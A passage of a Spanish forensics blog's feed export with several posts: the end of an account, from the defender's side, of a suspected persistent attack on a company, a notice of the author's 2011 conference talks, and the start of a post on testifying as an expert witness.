apoderarse de datos privados de los empleados de está empresa, (no me atrevo a decir con que objeto). Aprovechando el ataque han instalado (utilizando ingeniería social) desde un keylogger hasta un kit de herramientas para la elevación de permisos, obtención de documentos y correos electrónicos.&lt;br /&gt;&lt;br /&gt;Por lo que parece no se sabe muy bien si esto ha llegado a funcionar, dado que parece que faltan ejecutables y todo apunta a que no estaba muy bien construido el malware, pero solo es una opinión y todavía faltan cosas por contrastar.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;¿CONCLUSIONES?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;En este punto surgen muchas dudas, por ejemplo ¿Como se envían los datos robados y a quien?. ¿porque quieren las cuentas de gmail de estos usuarios?, ¿Quien tiene este especial interés?, ¿Es alguien de dentro o de fuera?, ¿Desde cuanto tiempo llevan actuando?.&lt;br /&gt;&lt;br /&gt;Stutnex&amp;nbsp;dio la bandera de salida, fue famoso internacionalmente por su complejidad e innovación, pero la cuestión es ¿cuantos de estos ataques en menor medida pasan en las empresas?, un pendrive en la puerta de un bar donde vas a tomar café, ¿no lo 'enchufarías' para ver lo que hay?.&amp;nbsp;¿Miramos lo suficiente nuestros log's de sistemas y aplicaciones?, quizás llegado a este punto donde la tecnología es parte fundamental de nuestra vida, deberíamos de prestar especial atención a esas pequeñas cosas como un escaneo de red, tráfico que no solemos tener o una regla modificada.&lt;br /&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;Deberemos de pensar en cosas como SIEM y disponer de inteligencia en nuestros sistemas de información que informen ante una anomalía.&lt;/div&gt;&lt;br /&gt;Todavía son muchas preguntas sin respuesta y en este instante mientras lees el post, en esta empresa (que sufre en silencio las hemorroides) siguen limpiando, revisando log's y actualizando políticas de contraseñas. También estamos haciendo el análisis forense y quedan muchas cosas por mirar.&lt;br /&gt;&lt;br /&gt;Una cosa más y por último, a día de hoy, algo o alguien todavía entra en mi cuenta ficticia de Gmail.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-jfKkyUVPlSs/TmnEPabFa9I/AAAAAAAACfY/-VcWvqnIFlk/s1600/Captura+de+pantalla+2011-09-09+a+la%2528s%2529+09.44.41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="305" src="http://2.bp.blogspot.com/-jfKkyUVPlSs/TmnEPabFa9I/AAAAAAAACfY/-VcWvqnIFlk/s400/Captura+de+pantalla+2011-09-09+a+la%2528s%2529+09.44.41.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-8290557536881937950?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/8290557536881937950/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=8290557536881937950' title='7 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8290557536881937950'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8290557536881937950'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/09/un-ataque-persistente-apt.html' title='Un ataque persistente (APT)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-XeR0QLgm7GY/Tl4y_Fq3QFI/AAAAAAAACd0/X9neuDGweRo/s72-c/Captura+de+pantalla+2011-08-31+a+la%2528s%2529+15.09.09.png' height='72' width='72'/><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-6474003564232680354</id><published>2011-06-20T16:47:00.000+02:00</published><updated>2011-06-20T16:47:22.397+02:00</updated><title type='text'>Vamos que nos vamos...</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-h1rbUO1pldU/Tf9dMRh_2NI/AAAAAAAACdI/_f431mHRf1s/s1600/sala-conferencias.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://3.bp.blogspot.com/-h1rbUO1pldU/Tf9dMRh_2NI/AAAAAAAACdI/_f431mHRf1s/s200/sala-conferencias.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Bueno...empieza el verano, la noche de San Juan y desde ConexionInversa os digo que vamos de 'tour'.&lt;br /&gt;&lt;br /&gt;Empezamos en A Coruña los días 22, 23 y 24 en el I Curso de Informática Forense, en esta conferencias nada más ni menos que doy dos charlas, una sobre malware y otra sobre un caso de pornografía infantil.&lt;br /&gt;&lt;br /&gt;Seguimos en la siguiente semana, por cuarto año consecutivo se va a celebrar, durante los días 28, 29 y 30 de Junio, el Curso de Verano de Seguridad y Auditoría Informática, de nuevo, en laUniversidad Europea de Madrid. El día 28 hablaré de Malware para Mac OSX (si ese que no existe).&lt;br /&gt;&lt;br /&gt;Estaré también y de forma oficial en la Noconname (NcN) dando una ponencia sobre entornos militares y prácticas de entrenamiento en seguridad informática, (no os lo perdáis).&lt;br /&gt;&lt;br /&gt;Y ya por último en Agosto en la &amp;nbsp;DFRWS 2011 Annual Conference, de New Orleans, con un tema de análisis de memoria ram.&lt;br /&gt;&lt;br /&gt;No obstante seguiré comentando las jugadas desde el blog. Saludos...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-6474003564232680354?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/6474003564232680354/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=6474003564232680354' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6474003564232680354'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6474003564232680354'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/06/vamos-que-nos-vamos.html' title='Vamos que nos vamos...'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-h1rbUO1pldU/Tf9dMRh_2NI/AAAAAAAACdI/_f431mHRf1s/s72-c/sala-conferencias.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-4328526897627303740</id><published>2011-06-04T19:40:00.000+02:00</published><updated>2011-06-04T19:40:22.180+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='anecdotas'/><category scheme='http://www.blogger.com/atom/ns#' term='Juicios'/><category scheme='http://www.blogger.com/atom/ns#' term='varios'/><title type='text'>Recomendaciones en un juicio</title><content type='html'>&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:WordDocument&gt;   &lt;w:View&gt;Normal&lt;/w:View&gt;   &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:TrackMoves/&gt;   &lt;w:TrackFormatting/&gt;   &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;   &lt;w:PunctuationKerning/&gt;   &lt;w:ValidateAgainstSchemas/&gt;   &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:DoNotPromoteQF/&gt;   &lt;w:LidThemeOther&gt;ES&lt;/w:LidThemeOther&gt;   &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:Compatibility&gt;    &lt;w:BreakWrappedTables/&gt;    &lt;w:SnapToGridInCell/&gt;    &lt;w:WrapTextWithPunct/&gt;    &lt;w:UseAsianBreakRules/&gt;    &lt;w:DontGrowAutofit/&gt;    &lt;w:SplitPgBreakAndParaMark/&gt;    &lt;w:DontVertAlignCellWithSp/&gt;    &lt;w:DontBreakConstrainedForcedTables/&gt;    &lt;w:DontVertAlignInTxbx/&gt;    &lt;w:Word11KerningPairs/&gt;    &lt;w:CachedColBalance/&gt;   &lt;/w:Compatibility&gt;   &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;   &lt;m:mathPr&gt;    &lt;m:mathFont m:val="Cambria Math"/&gt;    &lt;m:brkBin m:val="before"/&gt;    &lt;m:brkBinSub m:val="--"/&gt;    &lt;m:smallFrac m:val="off"/&gt;    &lt;m:dispDef/&gt;    &lt;m:lMargin m:val="0"/&gt;    &lt;m:rMargin m:val="0"/&gt;    &lt;m:defJc m:val="centerGroup"/&gt;    &lt;m:wrapIndent m:val="1440"/&gt;    &lt;m:intLim m:val="subSup"/&gt;    &lt;m:naryLim m:val="undOvr"/&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"  DefSemiHidden="true" DefQFormat="false" DefPriority="99"  LatentStyleCount="267"&gt;   &lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;   &lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;   &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;   &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;   &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;   &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;   &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;   &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;   &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;   &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;   &lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;   &lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;   &lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;   &lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;   &lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;   &lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;   &lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;   &lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;   &lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;   &lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;   &lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;   &lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;   &lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;   &lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;   &lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;   &lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"   UnhideWhenUsed="false" Name="Table Grid"/&gt;   &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;   &lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;   &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Shading"/&gt;   &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"   UnhideWhenUsed="false" Name="Light List"/&gt;   &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Grid"/&gt;   &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;   &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;   &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 1"/&gt;   &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 2"/&gt;   &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;   &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;   &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;   &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"   UnhideWhenUsed="false" Name="Dark List"/&gt;   &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Shading"/&gt;   &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful List"/&gt;   &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Grid"/&gt;   &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"   UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;   &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;   &lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;   &lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;   &lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;   &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"   UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;   &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"   UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"   UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;   &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"   UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"   UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;   &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"   UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"   UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;   &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"   UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"   UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;   &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"   UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"   UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"   UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;   &lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;   &lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;   &lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;   &lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;   &lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;   &lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;   &lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt; /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0cm; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;}&lt;/style&gt; &lt;![endif]--&gt;  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-yo3Wb5jla5s/Tepr3mGJyHI/AAAAAAAACc0/8b268nI4X5k/s1600/Captura.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="149" src="http://1.bp.blogspot.com/-yo3Wb5jla5s/Tepr3mGJyHI/AAAAAAAACc0/8b268nI4X5k/s200/Captura.PNG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Cada vez son más las causas e imputados que utilizan las nuevas tecnologías como medio de extorsión, acoso, robo o para delinquir. Internet es un medio que para muchos de los mortales es desconocido y que también permite el anonimato y por ende muchas mafias lo utilizan como medio para cometer fraude.&lt;br /&gt;&lt;br /&gt;Este año está siendo para mí el año de los Juicios, prácticamente desde el mes de Enero no he parado de testificar en calidad de perito y testigo. En lo que llevamos de año va ganando los juicios por 'fuga de datos (robo de datos de clientes, programas, documentación)", "Pornografía infantil (producción y consumo)" e "intromisión a la privacidad de las personas (lectura de correos, usurpación de identidad, insultos, acoso)".&lt;br /&gt;&lt;br /&gt;Tarde o temprano y dependiendo de la cuantía del fraude o delito y si se ha realizado un buen análisis o peritaje es más que probable que acabe en un Juzgado pendiente de resolución Judicial.&lt;br /&gt;&lt;br /&gt;En este post, (que no va a ser técnico) quiero hablar de las cosas que uno &lt;u&gt;debe de tener 